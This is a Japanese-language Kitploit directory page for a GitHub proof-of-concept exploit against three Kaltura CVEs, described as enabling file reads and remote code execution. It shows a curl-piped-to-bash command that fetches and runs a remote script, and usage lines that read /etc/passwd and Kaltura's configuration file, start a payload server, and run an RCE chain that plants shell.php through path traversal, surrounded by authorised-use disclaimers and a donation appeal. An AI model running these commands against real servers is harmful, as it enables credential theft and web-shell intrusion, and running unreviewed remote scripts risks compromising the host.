Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-19912-CVE-2026-19913-CVE-2026-19914 — CVE-2026-19912、CVE-2026-19913、CVE-2026-19914の概念実証エクスプロイト。Kalturaにおけるファイル読み取りとリモートコード実行を実証し、許可されたセキュリティテストと教育を目的としています。 | Kitploit
ツール/GitHubGitHub/horkimhab/cve-2026-19912-cve-2026-19913-cve-2026-19914
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト学習と教育
GitHubhorkimhab/cve-2026-19912-cve-2026-19913-cve-2026-19914

CVE-2026-19912-CVE-2026-19913-CVE-2026-19914

CVE-2026-19912、CVE-2026-19913、CVE-2026-19914の概念実証エクスプロイト。Kalturaにおけるファイル読み取りとリモートコード実行を実証し、許可されたセキュリティテストと教育を目的としています。

リポジトリを見る
8時間25分前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-19912、CVE-2026-19913、CVE-2026-19914

寄付

このプロジェクトの維持にご協力ください

このプロジェクトが役立つと感じられた場合、PayPalまたはABA Mobileを通じて継続的なメンテナンスへのご支援をご検討ください。

❤️ ១០% នៃការបរិច្ចាគរបស់អ្នក នឹងត្រូវបានបរិច្ចាគជូនមន្ទីរពេទ្យគន្ធបុប្ផា។

❤️ 寄付金の10%はカンタ・ボファ小児病院に寄付されます。

支払い方法を選択

Donate securely with PayPal

ABA Mobile donation QR code
ABA Mobileでスキャン · クリックで拡大

⚡ 簡単な使い方

外部ダウンロードスクリプトの最新版をGitHubから直接実行します:

root@kitploit:~
bash <(curl -fsSL https://raw.githubusercontent.com/HORKimhab/collection-scripts/main/get-svn.sh)

このコマンドにはBashとcurlが必要です。ソースを信頼できない場合は、実行前にリモートスクリプトを確認してください。

このプロジェクトは、安全で許可された環境でのみ使用してください。例:

  • ローカル仮想マシン
  • Dockerコンテナ
  • 隔離されたラボ環境
  • 許可されたペネトレーションテスト環境

セットアップ例:

root@kitploit:~
git clone <repository-url>
cd <repository-name>

# プロジェクトは以下のようにPythonを使用します

# 仮想環境を作成
python -m venv venv

# 仮想環境を有効化

# macOS / Linux
source venv/bin/activate

# Windows (Git Bash / WSL)
source venv/Scripts/activate

# 依存関係をインストール
pip install -r requirements.txt

使用例:

root@kitploit:~
# 1. ファイル読み取り(最も信頼性が高く、記事の説明どおりに動作します)
python3 kaltura_poc.py fileread http://127.0.0.1 -f /etc/passwd
python3 kaltura_poc.py fileread http://127.0.0.1 \
    -f /opt/kaltura/app/configurations/local.ini --try-versions

# 2. ペイロードサーバーのみ(Burp / curlと手動で併用)
python3 kaltura_poc.py serve --lport 8888

# 3. 完全なチェーンのスケルトン
python3 kaltura_poc.py rce http://127.0.0.1 \
    --lhost 172.17.0.1 --lport 8888 \
    --payload stdclass \
    --shell '../../../../../../../../var/www/html/shell.php'

クレジットまたは参考

  • https://anddone-git.github.io/2026/one-parameter-two-bugs/

📚 教育目的のセキュリティ研究リポジトリ

管理された環境でサイバーセキュリティの概念を学習、テスト、研究するためのリポジトリです。


⚠️ セキュリティおよび法的免責事項

目的

このリポジトリは教育および許可されたセキュリティ研究のみを目的としています。

ユーザーが以下について学ぶことを目的として設計されています:

  • セキュリティの脆弱性
  • サンドボックスと隔離の概念
  • 安全なコーディングと防御的プラクティス

許可された使用のみ

このリポジトリは、許可を得た環境でのみ使用してください。例:

  • 個人のラボまたは仮想マシン
  • Dockerまたは隔離された環境
  • 許可されたペネトレーションテスト
  • サイバーセキュリティトレーニングまたは学術研究

許可のない、または違法な使用は固く禁止されています。


免責事項

著者および貢献者は、このプロジェクトによって引き起こされた損害、誤用、法的問題、または損失について一切の責任を負いません。

このリポジトリを使用することにより、以下に同意したものとみなされます:

  • 自身の行動に責任を持つこと
  • 合法的かつ倫理的に使用すること
  • プロジェクトは保証なしで提供されること

倫理的な使用

このプロジェクトは以下を目的としています:

  • 防御的セキュリティ研究
  • サイバーセキュリティ教育
  • 脆弱性の認識
  • 安全なシステムおよびソフトウェア研究

責任ある開示の慣行に従い、適用されるすべての法律を遵守してください。


連絡先

責任ある開示やコラボレーションについては、GitHubを通じてリポジトリのメンテナーにご連絡ください。


関連プロジェクト

許可されたセキュリティ研究と教育を目的とした追加のCVE概念実証リソースについては、PoC CVEコレクションをご覧ください。

ツールをダウンロード